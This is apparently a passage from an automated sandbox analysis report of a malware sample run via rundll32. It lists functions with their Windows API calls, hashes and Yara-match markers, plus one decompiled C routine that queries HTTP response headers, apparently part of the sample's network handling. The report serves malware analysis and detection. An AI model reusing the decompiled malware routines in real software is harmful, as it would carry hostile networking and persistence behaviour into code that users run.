                                                          • Instruction ID: 735c93897a3914a71caf3239ffd82fc179a8389a653fb2662b38456cc4f259fe
                                                          • Opcode Fuzzy Hash: 6ca47a7aa36300f07097b7a8039d94202017c4bee489b6ec305d35ae2e5b7c1b
                                                          • Instruction Fuzzy Hash: B2515D71D2021AEFDF91AFA0DC88EEEBBB9EF48702F144019E911A6194DB359941CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628948C Relevance: 10.6, APIs: 7, Instructions: 138memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 062894B7
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 062894D4
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06289507
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 06289532
                                                          • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 062895F7
                                                            • Part of subcall function 0627D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0627DA7B,?), ref: 0627D4E3
                                                            • Part of subcall function 0627D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0627D506
                                                            • Part of subcall function 0627D4DA: memset.NTDLL ref: 0627D515
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 062895A8
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 062895D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                          • String ID:
                                                          • API String ID: 239510280-0
                                                          • Opcode ID: 427a3dfb801595c1d5d5744bf9bd7e1e883c0580ba61a5d689494bfb6609ca51
                                                          • Instruction ID: 139eb264d6fbdb71c49e696ca609c16ca5df70485f4a701fd4480acb668c1c93
                                                          • Opcode Fuzzy Hash: 427a3dfb801595c1d5d5744bf9bd7e1e883c0580ba61a5d689494bfb6609ca51
                                                          • Instruction Fuzzy Hash: C541BA31E21305BFEB526B58DC49FAD7BA9DF84745F104015FE05A71C0DB759A80DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628D698 Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D6F2
                                                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D710
                                                          • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0628D73C
                                                          • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D753
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628D766
                                                          • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D775
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?), ref: 0628D7D9
                                                            • Part of subcall function 0627F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0627F384
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                          • String ID:
                                                          • API String ID: 1635816815-0
                                                          • Opcode ID: bcb2a68801a209f53e1355a4a74261fcffba08df82470aac06314a8ac9102c55
                                                          • Instruction ID: af95c94921bab161567d6c11806aa0ffea9460598a8863983bf8e9a52d1fd40c
                                                          • Opcode Fuzzy Hash: bcb2a68801a209f53e1355a4a74261fcffba08df82470aac06314a8ac9102c55
                                                          • Instruction Fuzzy Hash: 6E41B331921219AFDBA2BFA5DC88BAEBBA5EF44350F004825FD04AB1D0D770D958DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628458D Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL ref: 062845B6
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 062845F9
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06284614
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0628466A
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 062846C6
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 062846D4
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 062846DF
                                                            • Part of subcall function 062726D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062726E7
                                                            • Part of subcall function 062726D3: memcpy.NTDLL(00000000,?,?,?), ref: 06272710
                                                            • Part of subcall function 062726D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 06272739
                                                            • Part of subcall function 062726D3: RegCloseKey.ADVAPI32(?), ref: 06272764
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                                          • String ID:
                                                          • API String ID: 3181710096-0
                                                          • Opcode ID: faed0c3c3e485a8113711cba8c592b3ca6694868a5560056abbcaf807c0172c1
                                                          • Instruction ID: 5a39081413e4c56f72478d592d86d46edb8c72de543009bd3140abf7ec411102
                                                          • Opcode Fuzzy Hash: faed0c3c3e485a8113711cba8c592b3ca6694868a5560056abbcaf807c0172c1
                                                          • Instruction Fuzzy Hash: C741AD32A21317AFDB51BF65EC88F6A3BE9EF84351F044024FE05DA180DB71D950CAA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291AAC Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 06291AED
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 06291B1B
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 06291B60
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 06291B88
                                                          • _strupr.NTDLL ref: 06291BB3
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 06291BC0
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 06291BDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 3831658075-0
                                                          • Opcode ID: 25b990438db1313fd7a222f4b87b0990beb62c6b7a6fa02cc9509ee3b77218b4
                                                          • Instruction ID: ebc396977b1a56829104308dbf2367362269658d24a191438437887f6b694c0a
                                                          • Opcode Fuzzy Hash: 25b990438db1313fd7a222f4b87b0990beb62c6b7a6fa02cc9509ee3b77218b4
                                                          • Instruction Fuzzy Hash: 0F416071D1031EEBDF219FA5DC49BDEBBBAAF88701F144066EA11A2250D7719690CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062848FD Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 06284943
                                                          • StrTrimA.SHLWAPI(?,?), ref: 06284961
                                                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 062849CA
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 062849EB
                                                          • DeleteFileA.KERNEL32(?,00003219), ref: 06284A0D
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06284A1C
                                                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 06284A34
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1078934163-0
                                                          • Opcode ID: 183f305c0e95e3bd4a4dd9681b8b04e1ee67edcb6af3785fe41ad831032adbb0
                                                          • Instruction ID: f469eb8ccc86e07062429850484dded19c7f68fde2825efe910b4de4c6e47f6c
                                                          • Opcode Fuzzy Hash: 183f305c0e95e3bd4a4dd9681b8b04e1ee67edcb6af3785fe41ad831032adbb0
                                                          • Instruction Fuzzy Hash: 2B319C32611306AFE751FB54ED08F6A77E9AF89744F040419FB44AB180D765E905CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627E011 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,06278478,00000000), ref: 0627E02B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0627E040
                                                          • memset.NTDLL ref: 0627E04D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,06278477,?,?,00000000,?,00000000,06289CD0,?,00000000), ref: 0627E06A
                                                          • memcpy.NTDLL(?,?,06278477,?,06278477,?,?,00000000,?,00000000,06289CD0,?,00000000), ref: 0627E08B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freememcpymemset
                                                          • String ID: chun
                                                          • API String ID: 2362494589-3058818181
                                                          • Opcode ID: 1b2ed6971e8d67300a4f3dd50ad7010d325a73d4e922e75e5b81cca5b9e594dc
                                                          • Instruction ID: bc8416ddf941ce21f781922a18d48c6ffde4f1ee3973ad3ce3a5abecc2c74f7f
                                                          • Opcode Fuzzy Hash: 1b2ed6971e8d67300a4f3dd50ad7010d325a73d4e922e75e5b81cca5b9e594dc
                                                          • Instruction Fuzzy Hash: EA319C71610706AFD7709F65DC45E16B7E9EF84210B058469ED99DB220D770E904CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D4A85 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D4A85(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E036D6D63(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E036D6C2C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E036D6E40( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                                          0x036d4a85
                                                          0x036d4a85
                                                          0x036d4a95
                                                          0x036d4a98
                                                          0x036d4a9c
                                                          0x036d4aa2
                                                          0x036d4aa7
                                                          0x036d4ac0
                                                          0x036d4ad4
                                                          0x036d4adb
                                                          0x036d4ae2
                                                          0x036d4b35
                                                          0x036d4b3b
                                                          0x036d4b41
                                                          0x036d4b7c
                                                          0x036d4b82
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d4b41
                                                          0x036d4ae8
                                                          0x00000000
                                                          0x036d4aef
                                                          0x036d4afd
                                                          0x036d4b00
                                                          0x036d4b03
                                                          0x036d4b0f
                                                          0x036d4b13
                                                          0x036d4b75
                                                          0x036d4b15
                                                          0x036d4b27
                                                          0x036d4b65
                                                          0x036d4b70
                                                          0x036d4b29
                                                          0x036d4b2c
                                                          0x036d4b30
                                                          0x036d4b30
                                                          0x036d4b27
                                                          0x00000000
                                                          0x036d4b13
                                                          0x036d4ae8
                                                          0x036d4aac
                                                          0x036d4ab2
                                                          0x036d4ab5
                                                          0x036d4aba
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d4b4a
                                                          0x036d4b52
                                                          0x036d4b57
                                                          0x036d4b5a
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 036D4A9C
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D4AAC
                                                          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 036D4ADE
                                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B03
                                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B23
                                                          • GetLastError.KERNEL32 ref: 036D4B35
                                                            • Part of subcall function 036D6E40: WaitForMultipleObjects.KERNEL32(00000002,036D7BB5,00000000,036D7BB5,?,?,?,036D7BB5,0000EA60), ref: 036D6E5B
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • GetLastError.KERNEL32(00000000), ref: 036D4B6A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 3369646462-0
                                                          • Opcode ID: de89933a5f45582c63b4f578cde8a1032e10297df9082a923d9db4a511e818c9
                                                          • Instruction ID: 13028b2bafd34cf7f1806a5f2982d840758f2aaa67facc0246d036d7cc194633
                                                          • Opcode Fuzzy Hash: de89933a5f45582c63b4f578cde8a1032e10297df9082a923d9db4a511e818c9
                                                          • Instruction Fuzzy Hash: E1313EB5D00308FFDB21DFE5D984AAEBBB8EB18300F1449ADD502E2244DB71AA44CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06278EAF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 06278ED3
                                                            • Part of subcall function 0627A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5F8
                                                            • Part of subcall function 0627A5E7: lstrlen.KERNEL32(?,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5FF
                                                            • Part of subcall function 0627A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0627A611
                                                            • Part of subcall function 0627A5E7: _snprintf.NTDLL ref: 0627A637
                                                            • Part of subcall function 0627A5E7: _snprintf.NTDLL ref: 0627A66B
                                                            • Part of subcall function 0627A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0627A688
                                                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 06278F6D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 06278F8A
                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 06278F92
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 06278FA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                          • String ID: s:
                                                          • API String ID: 2960378068-2363032815
                                                          • Opcode ID: c6667fbb1f3a4eea853b549a9210502ee6ea121a7862ca784334b791535a7caf
                                                          • Instruction ID: db6d5798fb8e2d4a5f1dc15435d7a6af2bd032eb1c5832614cd8abe0fcec0aad
                                                          • Opcode Fuzzy Hash: c6667fbb1f3a4eea853b549a9210502ee6ea121a7862ca784334b791535a7caf
                                                          • Instruction Fuzzy Hash: 7D317F72A10206BFDB519BE9DC88FDEBBFDAF48315F000464EA15E2141E774A6048B71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062713E0 Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 062713F6
                                                          • lstrcmpiW.KERNEL32(00000000,?), ref: 0627142E
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 06271443
                                                          • lstrlenW.KERNEL32(?), ref: 0627144A
                                                          • CloseHandle.KERNEL32(?), ref: 06271472
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0627149E
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 062714BC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                          • String ID:
                                                          • API String ID: 1496873005-0
                                                          • Opcode ID: 5491138575f9f7e61b7b96811be9a590cdd9488d0c34caeddf28a6fabc876700
                                                          • Instruction ID: d70c550b7e617283594556cb6c7a2efb1b1932c30b0bea89143c64b17dfcec09
                                                          • Opcode Fuzzy Hash: 5491138575f9f7e61b7b96811be9a590cdd9488d0c34caeddf28a6fabc876700
                                                          • Instruction Fuzzy Hash: 4E217171A20306AFDB519F75EC9CE5A77BDAF48648B084125AE01E2140DB30D915EB74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627F7F2 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(0627F67C,00000000,0629A420,0629A440,?,?,0627F67C,0628E453,0629A420), ref: 0627F802
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0627F818
                                                          • lstrlen.KERNEL32(0628E453,?,?,0627F67C,0628E453,0629A420), ref: 0627F820
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627F82C
                                                          • lstrcpy.KERNEL32(0629A420,0627F67C), ref: 0627F842
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0627F67C,0628E453,0629A420), ref: 0627F896
                                                          • HeapFree.KERNEL32(00000000,0629A420,?,?,0627F67C,0628E453,0629A420), ref: 0627F8A5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                          • String ID:
                                                          • API String ID: 1531811622-0
                                                          • Opcode ID: d12f3d68bda43b5f6ef4e102157bab1030a9557fe8a7b091ecfbd60de9e2f218
                                                          • Instruction ID: f92969dadf28ec352599921a6cb1a7b987a4f7abe73fc697f3adf332df9dccdd
                                                          • Opcode Fuzzy Hash: d12f3d68bda43b5f6ef4e102157bab1030a9557fe8a7b091ecfbd60de9e2f218
                                                          • Instruction Fuzzy Hash: 3B21D731504345AFEB124F69EC49F6A7FA7EF8A394F144058ED4897251C7319C45DBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062913B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,06280E77,00000000), ref: 062913DA
                                                            • Part of subcall function 06283193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 062831CD
                                                            • Part of subcall function 06283193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831DF
                                                            • Part of subcall function 06283193: GetTickCount.KERNEL32 ref: 062831EA
                                                            • Part of subcall function 06283193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831F6
                                                            • Part of subcall function 06283193: lstrcpy.KERNEL32(00000000), ref: 06283210
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000), ref: 06291415
                                                          • wsprintfA.USER32 ref: 06291428
                                                          • GetTickCount.KERNEL32 ref: 0629143D
                                                          • wsprintfA.USER32 ref: 06291452
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                          • String ID: "%S"
                                                          • API String ID: 1152860224-1359967185
                                                          • Opcode ID: f2f465d0e0856c276b643d22328e695ddfe7fee6ce50820774b3c8fa523f7ce7
                                                          • Instruction ID: e28d4f5784871603004a10e57aa2cb8e7d983e482541e32ec82fa8dc8e0302dc
                                                          • Opcode Fuzzy Hash: f2f465d0e0856c276b643d22328e695ddfe7fee6ce50820774b3c8fa523f7ce7
                                                          • Instruction Fuzzy Hash: E111D072A113167FD780BBA5AC4CE6F779CDFC9664B054428FE58A7241DA389800CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627977C Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,0627314A,00000000), ref: 062797BD
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,0627314A,00000000,00000000,00000004,?,00000000,?), ref: 06279830
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 2078930461-0
                                                          • Opcode ID: c80eb6bb0fe039c1accb0f1b41ee07d3dc5a24a36f99c58d83eea8d6e650f756
                                                          • Instruction ID: 01014a0652bed9b416474383d5ec047774042dff1eaa49bf06fedbda8855498d
                                                          • Opcode Fuzzy Hash: c80eb6bb0fe039c1accb0f1b41ee07d3dc5a24a36f99c58d83eea8d6e650f756
                                                          • Instruction Fuzzy Hash: 5111C131A51325BFD7722A21BC4DF6F3F9EEB897A5F000121FB45A5190D6724898CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628EA15 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,0628EA2E,?,76C85520,773BEEF0,?,00000000,0627E842,00000000,0689C310), ref: 062835F5
                                                            • Part of subcall function 0628358E: sprintf.NTDLL ref: 06283616
